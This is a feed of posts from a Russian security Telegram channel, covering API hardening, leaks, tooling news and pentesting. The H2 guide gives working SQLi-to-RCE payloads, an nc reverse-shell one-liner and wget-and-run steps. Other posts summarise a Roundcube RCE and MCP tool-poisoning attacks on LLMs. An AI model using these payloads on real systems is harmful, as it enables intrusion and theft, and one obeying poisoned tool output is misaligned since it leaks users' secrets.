poxek | Unsorted

Telegram-канал poxek - Похек

14364

All materials published on the channel are for educational and informational purposes only. Чат: @poxek_chat Админ: @szybnev Рекламный менеджер: @not_savely Купить рекламу: https://telega.in/c/poxek РКН: https://clck.ru/3FsVhp

Subscribe to a channel

Похек

😊 API Gateway как линия фронта в Web3

Внимание: CatSwap в этом тексте — не стартап и не “очередной ”, а наш pet-проект для иллюстрации. Он нужен, чтобы показать, как Web3-сервисы должны мыслить в части защиты API — не опираясь на бэкэнд, а начиная с Gateway.


В Web3 большинство угроз входит не через «модные» DeFi-примитивы, а через вполне классический API-интерфейс. Просто формат другой: не form-data, а подписанный JSON с маршрутом, суммой и временной меткой. CatSwap, как агрегатор, — типичный пример. Все транзакции, котировки, swap-запросы проходят через публичное API.

Чеклист по защите API Gateway

▫️ HTTPS (TLS 1.2+) + WAF
• Принудительное HTTPS;
• WAF / WAF с OWASP CRS, бот-контролем и Geo-ACL.

▫️ Аутентификация
• JWT в envoy.filters.http.jwt_authn;
• Web3-подписи (EIP-191/712) через Proxy-Wasm (X-Address + X-Signature);
• Challenge-nonce, защита от replay-атак.

▫️ Авторизация (OPA / ExtAuthz)
• RBAC/ABAC-политики по ролям, slippageTolerance, gasPrice, геопозиция, времени суток;
• Динамические политики Rego + GitOps-репозиторий.

▫️ JSON-валидация запросов
• OpenAPI-схемы → Envoy JSON Validator, ошибка 400 при несоответствии;
• Чёткое разделение обязательных и опциональных полей.

▫️ Rate Limit & QoS
/v1/quote ≤ 1000 r/m; /v1/swap ≤ 100 r/m;
• Circuit breaker, retry, max concurrent;
• Приоритет маршрутов, Kubernetes Resource Limits.

▫️ API Gateway (Envoy + Proxy-Wasm)
• JWT (RS256) через envoy.filters.http.jwt_authn;
• JSON Schema Validator — строгая валидация payload;
• Rate-limit, circuit breaker, retry с экспоненциальным backoff;
• ExtAuthz → ML-анализ;
• mTLS внутри кластера (Istio-SDS или Envoy native).

▫️ Логирование & мониторинг
• JSON Access Logs (path, key, user_id, latency, tx_hash);
• Prometheus (p95/p99, ошибки, RPS) / Grafana—дашборды;
• OpenTelemetry + Jaeger; трассировка end-to-end;
• GitOps-аудит конфигов (ArgoCD/Flux).

▫️ Management plane hardening
• Bastion-host с MFA для доступа к административным интерфейсам;
• Жёсткие IAM-роли и Just-In-Time elevation для операторов.

▫️ CI/CD & GitOps
• Инфраструктура как код (Terraform, Helm);
• ArgoCD синхронизация; PR-ревью, tfsec/checkov, canary-релизы.

▫️ Supply chain security & SBOM
• Генерация и хранение SBOM для всех контейнеров и зависимостей;
• Подпись артефактов (cosign/Sigstore) и верификация на этапе деплоя.

▫️ Контроль изменений и drift detection
• Policy as Code (OPA, Terraform Sentinel);
• Инструменты проверки конфигураций (tfsec, Checkov, Conftest).

▫️ ML-анализ в Gateway 💻
• Isolation Forest в Seldon Core; Envoy ExtAuthz вызывает /predict;
• Блокировка при score > 0.8; алёрты в SIEM/Slack.

▫️ API lifecycle & versioning
• Явное управление версиями API, deprecation-policy, backward-compatibility тесты;
• Тёмные и канареечные запуски (traffic mirroring) новых эндпоинтов.

▫️ Disaster recovery & multi-region failover
• Репликация Gateway в нескольких регионах; автоматический DNS-фейловер;
• Документированные RTO/RPO и регулярные drill-тесты.

▫️ Пентесты & Bug Bounty
• Ежеквартальные внешние пентесты API Gateway и RPC-узлов;
• Запуск программы Bug Bounty (HackerOne / Standoff / bizone) для непрерывного обнаружения уязвимостей.

▫️ План реагирования на инциденты (по просьбе SOC)
• Определённые playbook: detection → containment → eradication → recovery;
• SLA/TTR для критичных сервисов; регулярные учения.

▫️ Приватные RPC (PrivateLink / IAM)
• JSON-RPC узлы скрыты за VPC Endpoint (PrivateLink / PSC);
• Доступ по SigV4 / ACL; rate-limit и circuit breaker перед нодами.

▫️ HTTP-security headers
• HSTS (Strict-Transport-Security), CSP, X-Frame-Options, X-Content-Type-Options;
• Защита от clickjacking и MIME-sniffing.

▫️ Сегментация сети и ограничения доступа
• Kubernetes NetworkPolicies; NSG/Security Groups;
• Микросегментация: отдельные VPC/subnet для критичных сервисов.

🔫 А зачем

В общем, это не просто чеклист для галочки. Это попытка собрать разумную, масштабируемую и живучую архитектуру, в которой API Gateway — не прослойка между интернетом и микросервисами, а полноценная точка принятия решений.

#appsec

Читать полностью…

Похек

Под капотом Госуслуг: как защищают системы, от которых зависит работа цифрового государства
#госуслуги #compliance #ГОСТ #ГИС #аудит #аттестация

Предисловие от меня: про бумажную безопасность и нет, это не хрень бесполезная, как многие считают)

Цифровизация госсектора привела к появлению сервисов, которые упростили взаимодействие граждан с государством. Яркий пример — портал Госуслуг, работа которого опирается на обширную инфраструктуру государственных информационных систем (ГИС).

В России действуют сотни федеральных, региональных и муниципальных ГИС, без которых невозможно представить работу органов власти. Часть из них напрямую используется гражданами, другие работают в фоновом режиме, обеспечивая интеграцию и автоматизацию процессов. Кроме того, появляются информационные системы, которые формально не являются ГИС, но тесно с ними связаны.

Оборотной стороной цифровизации становятся риски кибербезопасности. В случае с ГИС ставки чрезвычайно высоки, ведь в таких системах агрегируются персональные данные миллионов пользователей и чувствительная для госструктур информация. Поэтому защита ГИС требует специфического подхода и регулирования со стороны ФСТЭК и ФСБ.

На связи Максим Кузнецов, руководитель отдела защиты информации ГИС в Бастионе. Сегодня расскажу об особенностях защиты ГИС и о том, с какими сложностями мы сталкиваемся в таких проектах.

🔗Читать полностью

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Данные на продажу: что происходит с информацией после утечек
#утечки #сливы #leak #leaks #РКН

Новости о крупных утечках данных больше никого не удивляют. Компании вкладывают миллионы в безопасность, проводят аудиты, но число таких инцидентов продолжает расти. Только в 2024 году Роскомнадзор зафиксировал 135 утечек — это более 710 миллионов записей о россиянах в базах данных. Но что происходит с данными после взлома? Куда они утекают? Кто и как их покупает?

Большинство новостей на тему утечек ограничиваются банальным «взломали, утекло, делайте выводы». Но утечка данных — это не конец истории, а только ее начало. После взлома данные начинают жить своей жизнью: их разбивают на части, объединяют с другими базами, разыгрывают на аукционах. Теневой рынок, построенный вокруг сбыта таких данных, напоминает отдельную экосистему, которая до сих пор слабо изучена даже среди ИБ-специалистов.

В этой статье разберем, как на практике выглядит жизненный цикл украденных данных. Представьте: вы — опытный специалист по киберразведке, помогающий компаниям справляться с последствиями утечек. Ранним июньским утром вас будит внезапный телефонный звонок. На другом конце провода — гендиректор ООО «Нас никогда не взломают». Судя по голосу, он явно встревожен...

🔗Читать полностью

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Ни один вывод с вашего сервера MCP не является безопасным
#MCP #AI #Anthropic #LLM #TPA #ATPA #FSP #pentest #research

Исследование CyberArk показало: MCP (Model Context Protocol) от Anthropic уязвим не только к классическим атакам Tool Poisoning (TPA), когда вредоносный код внедряют в описание инструмента, но и к Full-Schema Poisoning (FSP). Теперь атаковать можно любые поля схемы — имена параметров, типы, обязательные поля и даже новые незадокументированные элементы. Самое опасное — Advanced Tool Poisoning Attack (ATPA): вредоносная логика внедряется в вывод инструмента или сообщения об ошибках. LLM, считая их легитимными, может раскрывать чувствительные данные (например, приватные ключи) или выполнять вредоносные действия. Такие атаки сложно обнаружить — они могут активироваться только в продакшене и выглядеть безобидно на этапе тестирования. Вывод: доверять MCP-серверам нельзя, проверять нужно все поля и любые ответы инструментов

🔗Читать полностью

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Релиз Cursor 1.0
#vibecoding #coding #cursor #AI #MCP

TLDR: В этом релизе представлен BugBot для проверки кода, новую фичу memories, настройка MCP в один клик, поддержка Jupyter, backgound agent вышел из беты и новый UI настроек Cursor.

1️⃣BugBot
Раньше была фича с ручной проверкой pull request в git на наличие багов. Было удобно, но видимо многие забыли её тыкать. Теперь эта функция автоматическая, если есть какие-то баги, то можно тыкать Fix in Cursor уже в самом Gitlab/Github и вам откроет Cursor на десктопе с заготовленным промптом под конкретную проблему. Как настроить - читайте доку. Мне эта фича и раньше нравилась, т.к. она по мимо сообщения о потенциальном баге, писала вероятность его "правдивости".
Оно всё равно платное осталось. Триалка на 7 дней! Дальше тратится, как за использование Max моделей.

2️⃣Background Agent для всех
Сама по себе это фича, которая позволяла выполнять агентские промпты в фоне распараллельно. Но она была в бете и обязывала выключить Privacy режим, что я даже на своих личных проектах не хотел делать, ведь это означало 100% слив своей кодовой базы в Cursor. Пункт про Privacy к сожалению пока ешё действует, т.к. команде нужно получить максимум фидбеке о её работе. Но если хотите побаловаться, то активировать можно, либо CMD/Ctrl+E или по иконке облачке справа сверху.

3️⃣Обновление для Data Science. Поддержка Jupyter Notebooks
Я лично эту обнову не очень понимаю, т.к. мой мир и мир Data Science явно находятся по разным берегам, но: Агент теперь может создавать и редактировать несколько ячеек непосредственно в Jupyter, что является значительным улучшением для исследовательских задач и задач по изучению данных. Пока эта фича доступна только с моделями Sonnet.

4️⃣Memories
Чтобы было понятно, что это за фича. Вспомните когда OpenAI релизнуло в ChatGPT общую память между чатами и возможность её изменения. По сути очень схожая фича, но пока в бете. Возможно я пока не вижу её потенциал, но я выработал лайфхак, чтобы переносить память между чатами: Напиши summary нашего диалога из этого чата, чтобы я мог перенести всю важную информацию и в другой чат.

5️⃣Установка MCP в один клик
На мой взгляд и так не возникало проблем ставить MCP в Cursor. Я раньше писа пост про безопасность MCP ТУТ. Собственнно от них не отказываюсь и лаббирую, что запускать MCP сервера надо в контейнерах. Как устанавливаются и запускаются они в новой версии Cursor, я пока ещё не протестил. Если появится инфа, то дополню пост. А также появилась возможность OAuth для этих же MCP, где требуется авторизация. Наверное чтобы не хранить API ключи локально.

6️⃣Улучшение ответов в чате
Эта обнова понравится людям-визуалам, которые любят таблички и диаграмки. Собственно это и добавляется прямо в чат, если попросить их сгенерировать. create Mermaid diagrams или Markdown tables.

7️⃣Минорное — обновление UI настроек Cursor IDE
Самое вкусное из этого на мой взгляд - это dashboard потраченных запросов, usage-based и сколько строк кода написано AI.


🔗Changelog

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Гайд по пентесту СУБД H2. Первая часть
#H2 #Java #pentest #research #SQLi

ЧАСТЬ 1 - ЧАСТЬ 2

Родители, закройте детям глаза, дальше будет Java)

➡️Начнём с теории:
H2 — это легковесная, кроссплатформенная система управления реляционными базами данных с открытым исходным кодом, полностью написанная на Java. Она может работать как во встроенном режиме (embedded), так и в режиме клиент-сервер, поддерживает хранение данных в памяти (in-memory) и на диске, что делает её идеальным выбором для разработки, тестирования и небольших production-проектов.

Я думаю большинство с ней никогда не сталкивалось, вот и я вчера впервые с ней повстречался. В ходе ресерча ноликов ноликов в одном Java проекте, я дошёл до потенциальной SQLi и я решил сразу пойти покрутить SQLi > RCE. Попробовав дефолтные векторы из постгри (чисто на рефлексе), понял что оно не работает(

Пошёл читать доку и оказалось, что прямого вектора до RCE, как в популярных СУБД типа PostgreSQL или MySQL - нет. Пошёл читать доку и ...пригрустнул, т.к. судя по сайту, мне предстояла попа-боль и костыльные извращенства, что собственно и произошло.

Верификация наличия SQLi идёт по классике:

something' OR 1=1; --
# Получаем 200 OK

something' OR 1=2; --
# Получаем ошибку

На этом даже останавливаться не будем.

В чём основаная проблема? Нет явного фунционала для выполнения команд на системе. Поэтому давайте сами напишем себе функции для RCE))

🕺 Я нашёл 2 вектора, как можно выполнять RCE в этой СУБД:
1️⃣ Менее удобный вектор, но прямолинейный. Создаём функцию и вызываем её, заменяя какие-нибудь данные в таблице, которые мы видим на странице.
import java.io.IOException;

public class Main {

public static void main(String[] args) throws IOException {
// Вызываем метод shell_exec() и выводим результат в консоль
System.out.println(shell_exec());
}

static String shell_exec() throws java.io.IOException {
// Выполняем команду "id" и создаём Scanner для чтения её вывода

java.util.Scanner cmd_output = new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A"); // Устанавливаем разделитель так, чтобы Scanner читал весь ввод целиком

// Если есть данные в выводе команды, возвращаем их, иначе — пустую строку
return cmd_output.hasNext() ? cmd_output.next() : "";
}
}


Итоговая нагрузка будет выглядеть вот так:
something' OR 1=1; DROP ALIAS IF EXISTS exec_cmd; CREATE ALIAS exec_cmd AS 'String shell_exec() throws java.io.IOException {
java.util.Scanner cmd_output = new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\\\A");
return cmd_output.hasNext() ? cmd_output.next() : "";
}'; UPDATE comments SET comment = exec_cmd() WHERE id = 13c60101-8142-42df-bebd-fb5905673c41; --


И проверяем результаты на странице. Содержимое комментария с этим UUID должно было замениться на вывод команды id, но если что-то не сработало, то будет пустой комментарий. Почему может не сработать? Возможно урезанное окружение, а может права выставлены корректно и СУБД не может выполнять системные команды. Попробуйте другие команды, если вдруг не получилось.

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

#note

Oracle давно закрыла возможность скачивания своих файлов без авторизации. Я сейчас снова с этим столкнулся и нашёл способ, как это обойти:

1. Простой способ. Обход через куку

wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie"  https://download.oracle.com/java/17/archive/jdk-17.0.12_linux-x64_bin.tar.gz


2. Если вам нужны более старые версии или какие-то Java SE Dev Kit'ы, где сайт не отдаёт прямую ссылку на скачивание, то можно проверить наличие их в зеркале Huawei
https://mirrors.huaweicloud.com/java/jdk/

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Old, but gold

Meme by @k0_oat

🌚 @poxek

Читать полностью…

Похек

Эти доклады отметил для себя как полезные и годные. Но другие доклады тоже хороши.

На самом деле давно не был на конфе, когда не понимаешь даже половину слов спикера и ... меня это радует, т.к. это значит есть развиваться)

Читать полностью…

Похек

Следующий спикер уже на сцене! Дмитрий Рыбалка, Lamoda Tech. "Talos Linux в production: без SSH и с удовольствием".

Читать полностью…

Похек

Дмитрий Евдокимов переходит к своему докладу: "Неочевидные и непонятные моменты безопасности Kubernetes".

Читать полностью…

Похек

Вайб кодинг на стероидах

🌚 @poxek_meme

Читать полностью…

Похек

Reverse Engineer Android Apps for API Keys
#android #reverse #RE #mobile #pentest #API

Статья с pwn.guide посвящена основам реверс-инжиниринга и цифровой криминалистики (форензики) приложений под Android. В ней рассматриваются ключевые этапы анализа мобильных приложений, важные инструменты и практические советы для начинающих и опытных специалистов по информационной безопасности.

➡️Основные моменты статьи:
➡️Описывается структура Android-приложений (APK-файлов), их компоненты и способы упаковки.
➡️Даётся обзор инструментов для реверса и форензики Android, включая такие популярные решения, как Apktool, Androguard, jadx, а также специализированные forensic-утилиты вроде androick и backhack.
➡️Пошагово разбирается процесс декомпиляции APK-файла, извлечения ресурсов, анализа манифеста и кода, поиска уязвимостей и вредоносных функций.
➡️Приводятся советы по анализу разрешений, трекеров и подозрительных библиотек, а также по выявлению признаков компрометации или вредоносной активности.
➡️Рассматриваются методы динамического анализа, включая запуск приложения на эмуляторе, мониторинг сетевых запросов и взаимодействие с файловой системой.

Даются рекомендации по автоматизации анализа с помощью скриптов и интеграции различных инструментов.

➡️Необходимый тулинг
Android Studio — For running and testing APKs.
ADB — For interacting with Android devices or emulators.
APKTool — For decompiling and recompiling APKs.
JADX — For decompiling APKs to Java source code.
HTTP Toolkit — For intercepting and analyzing HTTP/HTTPS traffic.

Кому будет полезна статья:
Материал рассчитан на специалистов по кибербезопасности, исследователей вредоносных программ, а также всех, кто интересуется анализом безопасности мобильных приложений Android.

🔗 Читать далее

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

🔎 Эксперты Curator обнаружили крупнейший DDoS-ботнет — 4,6 миллиона устройств

16 мая специалисты Curator зафиксировали и нейтрализовали масштабную DDoS-атаку, в которой использовался огромный ботнет — крупнейший за всю историю наблюдений. Он включал 4,6 млн устройств — это в разы превышает рекорды прошлых лет: для сравнения, в 2023 году — 136 тыс. устройств, а в 2024 — 227 тыс.

Атака проходила в несколько этапов:

⚡️ На первом этапе — чуть больше 2 млн устройств
⚡️ На втором — еще 1,5 млн
⚡️ На третьем — дополнительно 1 млн устройств, всего 4,6 млн

С данным ботнетом эксперты компании Curator уже сталкивались ранее в этом году — тогда его размер составлял 1,33 млн устройств. Сейчас он вырос более чем втрое, что свидетельствует о его активном развитии и повышении угрозы.

🌍 География ботнета:

🇧🇷 Бразилия — 1,37 млн устройств
🇺🇸 США — 555 тыс.
🇻🇳 Вьетнам — 362 тыс.
🇮🇳 Индия — 135 тыс.
🇦🇷 Аргентина — 127 тыс.

Такой ботнет обладает потенциалом генерировать десятки миллионов запросов в секунду. Подобная нагрузка может запросто вывести из строя любой онлайн-ресурс. Не каждый провайдер DDoS-защиты сможет с ней справиться.

👉 Оставайтесь на шаг впереди угроз — следите за новостями и аналитикой в канале Curator

Реклама: ООО "ЭЙЧ-ЭЛЬ-ЭЛЬ", ИНН 7704773923

Читать полностью…

Похек

ИИ обошел 90% команд на соревновании хакеров

Исследователи из Palisade Research (это те, у которых недавно выходило вот это громкое исследование про саботаж моделей) сделали специальный AI-трек на двух недавних соревнованиях Capture The Flag от крупнейшей платформы Hack The Box. Суммарно участие принимали почти 18 тысяч человек и 8 500 команд. Из них несколько полностью состояли из ИИ-агентов. Вот что вышло:

В первом небольшом соревновании (≈400 команд) четыре из семи агентов решили по 19 из 20 задач и вошли в топ 5 % участников
Во втором большом CTF (≈8 000 команд) лучшему ИИ-агенту удалось захватить 20 флагов из 62 и оказаться в топ-10%
При этом агенты справляются почти со всеми задачами, на которые человек тартит до часа времени, и делают это в разы быстрее

Одинаково неплохо моделям удавались и задачи на взлом шифра, и веб-взломы, и форензика, и эксплуатация уязвимостей 💀

Ну и экономический эффект тоже на месте. Если принять во внимание, что на одну команду из топ-5% обычно уходит не менее нескольких сотен человеко-часов на подготовку, анализ и написание эксплойтов, то даже самый дорогой агент, который работал 500ч, в итоге обошелся дешевле, чем 10 таких живых команд.

arxiv.org/pdf/2505.19915

Читать полностью…

Похек

Один из подписчиков задал вопрос в чате, какие у кого пет проекты. Пишите в комментариях, что пишите, ссылки на репозитории, если оно паблик, накидаем звездочек) Также расскажите, почему выбрали такой пет проект и какая мотивация его развивать.

А если нет пет проектов, то пофантазируйте, что хотелось бы написать)

Прочитаю все комменты)

🌚 @poxek

Читать полностью…

Похек

Новые атаки GOFFEE: разбор Kill Chain и анализ вредоносного ПО
#reverse #malware #killchain #forensic #форензика

В прошлом и нынешнем году коллеги из «Лаборатории Касперского» и BI.Zone рассказывали о группировке GOFFEE (Paper Werewolf). В конце мая автор статьи снова фиксировали ее активность, но немного в другом обличии — можно сказать, в новой овечьей шкуре. Автор статьи Никита Полосухин, ведущий аналитик центра мониторинга и реагирования на кибератаки, и я расскажу, как сейчас действует GOFFEE и как обнаружить их присутствие в инфраструктуре.

Что изменилось?
Итак, сначала к главному:

У вредоносного документа во вложении фишингового письма имеется уязвимость загрузки удаленных шаблонов СVE-2017-0199. Полезная нагрузка, как и ранее, находится в самом документе, закодированная в base64, но вредоносный макрос, который запускает ее, теперь скачивается в шаблоне.

PowerModul загружает основную нагрузку в память через [System.Reflection.Assembly]::Load, что не встречалось в атаках этой группировки в прошлом.

🔗А теперь — разбор.

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

🔥 9.9 Critical
Post Auth RCE для Roundсube

Небезопасная десериализация. Инжектится через GET-параметр _from, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения.

?_task=settings&_action=upload&_from=mail%2Finbox


Пошагово, как работает эксплоит:
1. Подменяет _from сериализованным объектом.
2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через rcube_pgp_engine → Crypt_GPG_Engine.
4. Во время вызова GPG-логики, Roundcube вызывает unserialize().
5. Триггерится код из первого шага

exploit // nuclei // research

Читать полностью…

Похек

В кроличьей норе. Штурмуем отладочную консоль «Яндекс Станции»
#IDA #reverse #Яндекс #IoT #железо #hardware

Эта статья появи­лась в про­цес­се ревер­са про­шивок «Яндекс Стан­ций». Автор про­вел реверс U-Boot про­цес­сора умной колон­ки и соз­дал ути­литу для его извле­чения из рас­шифро­ван­ного заг­рузчи­ка. Спо­соб уни­вер­сален для всех подоб­ных устрой­ств и, воз­можно, дру­гих гад­жетов с чипом Amlogic.

Раз­работан­ный мной метод подой­дет для:
➡️«Стан­ции Mini2» (YNDX-00020/21);
➡️«Стан­ции Lite» (YNDX-00025);
➡️«Стан­ции Max» (YNDX-00053/0008);
➡️дру­гих устрой­ств на Amlogic S905X2 (G12) и A113X (AXG).

В про­цес­се автор рас­ска­жу о паре инте­рес­ных пла­гинов для IDA: с помощью Diaphora мы поза­имс­тву­ем информа­цию из схо­жего опен­сор­сно­го про­екта, а FindCrypt поможет нам отыс­кать крип­тогра­фичес­кие кон­стан­ты.

🔓 Читать далее

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Гайд по пентесту СУБД H2. Вторая часть
#H2 #Java #pentest #research #SQLi

ЧАСТЬ 1 - ЧАСТЬ 2

2️⃣ Удобный, но более жирный по коду вектор
Ещё в прошлом примере мы делали unalias на возможно существующую команду, на всякий случай. Теперь же мы создадим свой alias и будем его использовать.

   CREATE ALIAS EXEC AS
'String e(String cmd) throws java.io.IOException {
// Формируем массив аргументов для выполнения команды в bash:
String[] c = {"/bin/bash", "-c", cmd};

// Запускаем процесс с указанной командой
Process p = Runtime.getRuntime().exec(c);

// Получаем поток вывода (stdout) запущенного процесса
java.io.InputStream stdIn = p.getInputStream();
// Оборачиваем InputStream в InputStreamReader для чтения символов
java.io.InputStreamReader isr = new java.io.InputStreamReader(stdIn);
// Оборачиваем InputStreamReader в BufferedReader для построчного чтения
java.io.BufferedReader br = new java.io.BufferedReader(isr);

// Переменная для накопления всего вывода команды
String result = "";
// Временная переменная для чтения текущей строки
String line = "";

// Считываем строки из вывода процесса до тех пор, пока они есть
while ((line = br.readLine()) != null)
// Добавляем каждую строку к результату (без перевода строки)
result += line;

// Возвращаем весь накопленный вывод команды как одну строку
return result;
}';

По сути мы напрогали себе shell на java))

Дальше мы можем уже щеголять нашей оболочкой в запросах по полной.
something' CALL EXEC('cat /etc/passwd'); --


➡️Как получить reverse shell?
Тут уже по классике cmd inj)
# сначала пишем на rev shell в файл. Как пример:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.10 9001 >/tmp/f" > shell.sh

Если не работает этот revshell, то попробуйте любой другой с сайта revshells.com
Далее поднимаем python3 http.server в папке, где хранится shell.sh

Далее идём снова в Repeater и скачиваем файл на атакуемую систему
CALL EXEC('wget http://10.10.10.10:8080/shell.sh -O /tmp/shell.sh');

Выдаём права
CALL EXEC('chmod +x /tmp/shell.sh');

Запускаем у себя лисенер, после на атакуемой тачке рев шелл
CALL EXEC('bash /tmp/shell.sh');


Проверяем консоль, должена была появится сессия. Дальше уже можете делать privesc по ситуации)

P.s. в 2019 году был репорт на скулю в H2 в dotCMS
https://www.sonarsource.com/blog/dotcms515-sqli-to-rce/

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Как AI-ассистенты открывают всему миру вашу почту и календарь

Всем привет!
Сегодня безумно популярна тема различных AI-агентов и в частности персональных AI-помощников, эдаких «Джарвисов» на минималках.

Эти помощники умеют читать и отправлять почту, ставить встречи в календарь и напоминать нам о них. И все это через удобный и привычный Телеграм!

Офигенно удобно, полезно и всячески ускоряет и упрощает нам жизнь! Если бы не одно но..

О том как создать такого ассистента и подключить его к своей почте есть огромное количество материалов, особенно видео на Youtube. Я посмотрел 10 наиболее популярных видео, у которых в сумме набирается около 700 000 просмотров.. И во всех есть один и тот же косяк!

Из-за неправильной настройки телеграм-тригера написать вашему «Джарвису» может кто угодно! И абсолютно также получить данные о письмах, контактах, встречах, написать письмо всем контактам и т.д. Любой человек, кто найдет вашего бота может получать любые данные! А учитывая, что многие сервисы осуществляют сброс пароля через подтверждение на почту, это может быть еще интереснее!!

Одна маленькая, скрытая настройка ставит под очень большой удар всю конфиденциальную информацию, что у нас есть 🎉

Я написал об этом небольшую статью и даже записал коротенькое видео, которое показывает, как это работает!

Надеюсь вам будет интересно узнать поподробнее, как это работает и как сделать вашего «Джарвиса» только вашим :)

До связи!

#aishe4ka #aiassistant #n8n

Читать полностью…

Похек

Подборка райтапов на #bootcamp #standoff365

🗂️Задание
- [web-1-1] Удаленное выполнение кода (RCE) на узле library.edu.stf
- [web-1-2] Локальное повышение привилегий (LPE) на узле library.edu.stf

➡️Райтап
[/channel/writeup_ctf/225]

🗂️Задание
- [web-3-1] Подделка запроса со стороны сервера (SSRF) на узле utils.edu.stf

➡️Райтап
[/channel/writeup_ctf/265]

- [web-3-2] Удаленное выполнение кода (RCE) на узле utils.edu.stf

➡️Райтап
[/channel/writeup_ctf/264]

🗂️Задание
- [web-4] Удаленное выполнение кода (RCE) на узле shop.edu.stf

➡️Райтап
[/channel/writeup_ctf/282]

🗂️Задание
- [web-5] Внедрение SQL-кода (SQLi) на узле tokenizer.edu.stf

➡️Райтап
[/channel/writeup_ctf/233]

🗂️Задание
- [web-6] Удаленное выполнение кода (RCE) на узле smashmusic.edu.stf

➡️Райтап
[/channel/writeup_ctf/450]

БОНУС: райтапы на категорию #infra
[/channel/writeup_ctf/282]

💬 Канал & Чат | 📺 RUTUBE | 📺 writeup_ctf?si=TX1b4ep75lAYIh7a">YouTube

Читать полностью…

Похек

БЕКОН 2025

🌚 @poxek

Читать полностью…

Похек

Михаил Кожуховский, Flowmaster. "Чем собирать контейнеры если вы параноик?".

Читать полностью…

Похек

Продолжаем! Альмир Сарваров, Банк ДомРФ. "Тонкая настройка безопасности OS Linux для контейнеров: вредно и полезно"

Читать полностью…

Похек

БЕКОН 2025

Хорошая локация, даже тут знакомых встретил)

Что очень удобно, 1 трек и не надо никуда бегать за докладчиками.

На удивление довольно много людей, но в целом какой-то толпучки нет, стенды удобно расставлены.

Классный мерч в большинстве, возьму себе пару идей на вооружение)
А еще стащил кучу стикеров, которые буду вам раздавать на мероприятиях, которую буду посещать))

Читать полностью…

Похек

Всем привет! Долго думал над этой темой. Мой канал - это сообщество, что я смог объединить вокруг одной идеи, а это было нелегко подружить множество маленьких интровертиков в большую кампанию людей, которая будет каждый день заходить на канал и читать посты, а более смелые еще и общаются в чате.

Канал веду в соло 4 года, от чего начал уставать последнее время. Скорее не так... У меня банально закончились идеи о чем еще написать, поэтому я прошу помощи у вас.

Если у вас есть какие-то классные темы, но вам не хватает мотивации их дописать или внешней критики, вы не знаете куда выложить, думаете что её не заметят и любые другие отмазки, чтобы не поделиться своими знаниями, то я предлагаю свой канал в качестве площадки для публикации контента. Я знаю, что у меня есть множество талантливых и трудолюбивых подписчиков, которые имеют идеи для контента, но сами его не пишут по различным причинам. Собственно это тот самый шанс, чтобы круто самореализоваться)

Win2Win:
1. Вы получаете огласку, как специалиста. Вы можете поделиться своим мнением, ресерчем, может какой-то интересной идеей. Это отличная возможность засветится. В мое время такого не было)
2. Я получаю помощь в развитии и поддержке канала.

Первоначально я ищу людей, которые также горят схожими идеями в прокачке ИБ сообщества в России. Мне не интересно работать с айтишными контент менеджерами, SMM или людьми, которые нагенерят мне идей или контента через нейросети (я это и без вас могу сделать). Если мы с вами сработаемся в перспективе, то я с радостью буду вам платить.

Канал развивался всегда с ходом моих интересов. Думаю пришло время попробовать для себя что-то новое - делегирование) и посмотреть, что из этого выйдет.

Банальные правила по идеям для статей: никаких гайдов, как за 5 минут взломать ватсап/вк, гайд как взламывать wifi со смартфона и т.д. Если это очевидный материал, который уже лет 20 есть в интернете, то такое не интересует. За спам или какие-то блечерские истории, буду выдавать бан. Уважайте свое и мое время)

Писать @szybnev

Читать полностью…

Похек

Всех с первым днем лета!

Читать полностью…

Похек

Стажировка в InfoJet
#стажировка

https://jet.su/securitystart/


26 мая – 16 июня Регистрация


————————
Я не знаю почему ко мне не пришли их SMM, хотя я специально попросил их об этом. Это не реклама, мне не платили, я просто хочу поддержать коллег и чтобы мои подписчики, кто еще не работают, а хотят - наконец нашли своё месте в какой-нибудь компании)

P.s. на будущее для всех компаний, кто делает стажировки по кибербезу, приходите ко мне в ЛС @szybnev и обсудим как можно пропиарить вашу стажировку

Читать полностью…

Похек

Пентест провайдера. Как цепочка классических багов привела к полной компрометации
#RCE #pathtraversal #killchain

В этой статье автор поделится исто­рией одно­го из выпол­ненных мной про­ектов, который показал, что даже в наше вре­мя встре­чают­ся прос­тые и базовые уяз­вимос­ти, гра­мот­ное сочета­ние которых может при­вес­ти к RCE.


Суть про­екта зак­лючалась в тес­тирова­нии срав­нитель­но скром­ного сег­мента внеш­ней инфраструк­туры заказ­чика — на стар­те было пре­дос­тавле­но все­го девять IP-адре­сов. Ско­уп, конеч­но, неболь­шой, но, как показы­вает прак­тика, даже это­го быва­ет дос­таточ­но для весь­ма инте­рес­ных находок. Так про­изош­ло и здесь!

